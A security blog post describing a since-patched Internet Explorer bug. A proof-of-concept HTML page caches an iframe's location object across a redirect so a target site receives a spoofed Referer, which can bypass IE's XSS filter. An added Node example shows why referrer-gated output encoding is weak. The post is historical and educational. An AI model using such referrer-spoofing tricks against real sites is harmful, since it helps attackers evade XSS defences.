After playing around for a while with how IE handles redirect chains inside iFrames, I found a way to fake the HTTP Referer header sent to a destination page. The technique could be used to fully bypass the IE XSS filter, since the filter uses the referrer to determine whether a request is a reflected attack.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Referrer_Spoof_Redirect</title>
</head>
<!-- main() is run on load; the listing as posted never invoked it -->
<body onload="main()">
<script language="JavaScript">
function main()
{
	// Load redirect.aspx (which redirects to bing.com) in a child frame.
	document.getElementById("myDiv").innerHTML = '<iframe src="redirect.aspx" width="600" height="180"></iframe><br /><br />';
	// In the frame's own context, cache its location object as Math.l before the
	// redirect finishes; once bing.com is showing, navigate through the cached
	// reference. The relative URL "1" is a second redirect that lands on the target.
	window[0].setTimeout('Math.l = location; alert("Once Bing loads, click OK"); Math.l.href = 1;');
}
</script>
<div id="myDiv"></div>
</body>
</html>

The iFrame was pointed at redirect.aspx, which redirected to bing.com. Before that redirect completed, a reference to the iFrame’s location object was cached as Math.l. After bing.com loaded, setting Math.l.href = 1 (which resolved through a second redirect to a target URL like whatismyreferer.com) caused the target site to receive bing.com as the HTTP Referer — even though the navigation was actually initiated by the attacker’s page. Because the cached location reference outlived the redirect chain, IE attributed the navigation to the document currently in the frame (bing.com) rather than to the script that triggered it, so the Referer no longer reflected the true origin.
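The defensive lesson is the one the XSS filter got wrong: any check that keys on the Referer header can be switched off by whoever controls that header. The following Node script is an added example, not code from the original post. It contrasts a reflected-parameter renderer that skips output encoding for apparently same-origin referrers with one that encodes unconditionally; the function names, the example.test/attacker.test hosts and the sample query string are all constructed for illustration.

```javascript
// Added example (not from the original post). Shows why a reflected-input
// defence must not depend on the Referer header: the referrer-spoofing bug
// described above makes a cross-site request look same-site, and a design
// that trusts same-site referrers then leaves the reflected value unencoded.
// Assumed names: encodeHtml, sameOriginReferer, referrerGatedRender,
// hardenedRender, demo. Hosts and query values are constructed.

// Minimal HTML encoder for text placed inside an element body.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// True when the Referer names the same origin as the request URL.
// A missing or unparseable header counts as cross-site.
function sameOriginReferer(requestUrl, referer) {
  if (!referer) return false;
  try {
    return new URL(referer).origin === new URL(requestUrl).origin;
  } catch (e) {
    return false;
  }
}

// Weak design (mirrors the filter's logic): only encode the reflected
// parameter when the request appears to come from another site.
// A Referer that merely claims the same origin disables the protection.
function referrerGatedRender(requestUrl, referer) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  const body = sameOriginReferer(requestUrl, referer) ? q : encodeHtml(q);
  return `<p>You searched for: ${body}</p>`;
}

// Hardened design: the header is client-influenced, so it plays no role;
// output encoding is applied on every request.
function hardenedRender(requestUrl) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return `<p>You searched for: ${encodeHtml(q)}</p>`;
}

// Constructed sample request: a harmless markup fragment in the reflected parameter.
const TARGET = "https://example.test/search?q=" + encodeURIComponent("<b>hi</b>");

// Render the same request three ways so the difference is visible.
function demo() {
  return {
    crossSite: referrerGatedRender(TARGET, "https://attacker.test/page"),
    spoofedSameSite: referrerGatedRender(TARGET, "https://example.test/"),
    hardened: hardenedRender(TARGET),
  };
}

console.log(demo());
```

Only the first and third outputs are encoded; the second shows the raw markup because the gated renderer believed the same-origin claim. The hardened version needs no knowledge of how the header was forged, which is the property to aim for: treat Referer as a hint for analytics, never as a security decision input.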

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.